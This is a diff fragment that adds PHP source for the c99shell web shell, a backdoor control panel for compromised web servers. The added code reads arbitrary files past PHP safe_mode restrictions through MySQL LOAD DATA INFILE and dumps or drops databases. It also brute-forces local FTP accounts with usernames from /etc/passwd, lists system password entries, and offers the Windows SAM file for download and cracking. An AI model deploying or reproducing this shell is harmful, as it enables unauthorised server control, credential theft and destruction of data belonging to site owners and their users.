+if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on")
+{
+ $openbasedir = true;
+ $hopenbasedir = "<font color=\"red\">".$v."</font>";
+}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+
+$sort = htmlspecialchars($sort);
+
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE);
+
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF	
+@ini_set("highlight.comment",$highlight_comment); //#FF8000	
+@ini_set("highlight.default",$highlight_default); //#0000BB	
+@ini_set("highlight.html",$highlight_html); //#000000	
+@ini_set("highlight.keyword",$highlight_keyword); //#007700	
+@ini_set("highlight.string","#DD0000"); //#DD0000
+
+if ($act != "img")
+{
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><? echo $HTTP_HOST; ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana,;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}</STYLE><style type="text/css"><!--body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}--></style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
+<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<? echo $surl; ?>"><font face="Verdana" size="5"><b><u>C99Shell v. <?php echo $shver; ?></u></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo php_uname(); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\","/",$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\","/",$d);
+if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+$dispd = htmlspecialchars($d);
+$pd = $e = explode("/",substr($d,0,strlen($d)-1));
+$i = 0;
+echo "<b>Directory: </b>";
+foreach($pd as $b)
+{
+ $t = "";
+ reset($e);
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r."/";
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = true;
+ $wdt = "<font color=\"green\">[ ok ]</font>";
+ echo "<b><font color=\"green\">".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = false;
+ $wdt = "<font color=\"red\">[ Read-Only ]</font>";
+ echo "<b><font color=\"red\">".view_perms(fileperms($d.$f))."</font></b>";
+}
+$free = diskfreespace(realpath($d));
+$all = disk_total_space(realpath($d));
+$used = $all-$free;
+$used_percent = round(100/($all/$free),2);
+echo "<br><b>Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%)</b><br>";
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
+  echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+$letters = "";
+if ($win)
+{
+ $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach ($abc as $letter)
+ {
+  if (is_dir($letter.":\\"))
+  {
+   if ($letter.":" != $v) {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ ".$letter." ]</a> ";}
+   else {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ <font color=\"green\">".$letter."</font> ]</a> ";}
+  }
+ }
+ if (!empty($letters)) {echo "<br><b>Detected drives</b>: ".$letters;}
+}
+?></p></td></tr></table><br><?php
+if ((!empty($donated_html)) and (in_array($act,$donated_act)))
+{
+ ?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php echo $donated_html; ?></td></tr></table><br><?php
+}
+?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_error();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
+ }
+ else {$sql_sock = false;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
+  else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+ 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td>Username</td><td align=right>Password&nbsp;</td></tr><form><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td align=right><input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr><td>HOST</td><td>PORT</td></tr><tr><td><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_error();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
+"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_error();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    echo "<option value=\"\">Databases (...)</option>
+";
+    $c = 0;
+    while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option>
+"; $c++;}
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  if ($sql_db)
+  {
+   echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+   echo "</b></center>";
+
+   $acts = array("","dump");
+
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($submit)
+    {
+     if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    }
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to  :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtpl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    $set = array();
+    $set["sock"] = $sql_sock;
+    $set["db"] = $sql_db;
+    $dump_out = "print";               
+    if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
+    elseif ($dump_out == "download")
+    {
+     @ob_clean();
+     header("Content-type: c99shell");
+     header("Content-disposition: attachment; filename=\"".$f."\";"); 
+     $set["print"] = 1;
+     $set["nl2br"] = 1;
+    }
+    $set["file"] = $dump_file;
+    $set["add_drop"] = true;
+    $ret = mysql_dump($set);
+    if ($dump_out == "download") {exit;}
+   }
+   else
+   {
+    $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); 
+    echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>";
+    echo "<tr>";
+    echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>";
+    echo "<td><center><b>Table</b></center></td>";
+    echo "<td><b>Rows</b></td>";
+    echo "<td><b>Type</b></td>";
+    echo "<td><b>Created</b></td>";
+    echo "<td><b>Modified</b></td>";
+    echo "<td><b>Size</b></td>";
+    echo "<td><b>Action</b></td>";
+    echo "</tr>";
+    $i = 0;
+    $tsize = $trows = 0;
+    while ($row = mysql_fetch_array($result, MYSQL_NUM))
+    {
+     $tsize += $row["5"];
+     $trows += $row["5"];
+     $size = view_size($row["5"]);
+     echo "<tr>";
+     echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>";
+     echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>";
+     echo "<td>".$row[3]."</td>";
+     echo "<td>".$row[1]."</td>";
+     echo "<td>".$row[10]."</td>";
+     echo "<td>".$row[11]."</td>";
+     echo "<td>".$size."</td>";
+     echo "<td>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a>
+<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;
+</td>";
+     echo "</tr>";
+     $i++;
+    }
+    echo "<tr bgcolor=\"000000\">";
+    echo "<td><center><b>»</b></center></td>";
+    echo "<td><center><b>".$i." table(s)</b></center></td>";
+    echo "<td><b>".$trows."</b></td>";
+    echo "<td>".$row[1]."</td>";
+    echo "<td>".$row[10]."</td>";
+    echo "<td>".$row[11]."</td>";
+    echo "<td><b>".view_size($tsize)."</b></td>";
+    echo "<td></td>";
+    echo "</tr>";
+    echo "</table><hr size=\"1\" noshade><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\">
+<option>With selected:</option>
+<option value=\"drop\" >Drop</option>
+<option value=\"empty\" >Empty</option>
+<option value=\"chk\">Check table</option>
+<option value=\"Optimize table\">Optimize table</option>
+<option value=\"Repair table\">Repair table</option>
+<option value=\"Analyze table\">Analyze table</option>
+</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>";
+    mysql_free_result($result);
+   }
+  }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstat","servervars","processes","getfile");
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+   }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock); 
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    elseif (($sql_act == "getfile"))
+    {
+     if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
+     elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
+     elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
+     else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
+     else
+     {
+      for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+      $f = ""; 
+      while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
+      if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";}
+      else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));}
+     }
+     mysql_free_result($result);
+     if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
+     }
+    }
+   }
+  }
+ }
+ echo "</tr></table></table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}}
+ echo "<br><br>";
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if ($win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  $fp = fopen("/etc/passwd","r");
+  if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+  else
+  {
+   ob_flush();
+   $i = $success = 0;
+   $ftpquick_st = getmicrotime();
+   while(!feof($fp))
+   { 
+    $str = explode(":",fgets($fp,2048));
+    $sock = ftp_connect("localhost",21,1);
+    if (ftp_login($sock,$str[0],$str[0]))
+    {
+     echo "<a href=\"ftp://".$str[0].":".$str[0]."@".$SERVER_NAME."\" target=\"_blank\"><b>Connected to ".$SERVER_NAME." with login \"".$str[0]."\" and password \"".$str[0]."\"</b></a>.<br>";
+     ob_flush();
+     $success++;
+    }
+    if ($i > $nixpwdperpage) {break;}
+    $i++;
+   }
+   if ($success == 0) {echo "No success. connections!";}
+   $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+   echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>";
+  }
+ }
+}
+if ($act == "lsa")
+{
+ echo "<center><b>Server security information:</b></center>";
+ echo "<b>Software:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>";
+ echo "<b>Safe-Mode: ".$hsafemode."</b><br>";
+ echo "<b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   $num = $nixpasswd + $nixpwdperpage;
+   echo "<b>*nix /etc/passwd:</b><br>";
+   $i = $nixpasswd;
+   while ($i < $num)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid) {echo join(":",$uid)."<br>";}
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+  if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=\"green\">You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+.</font></b><br>";}
+ }
+}
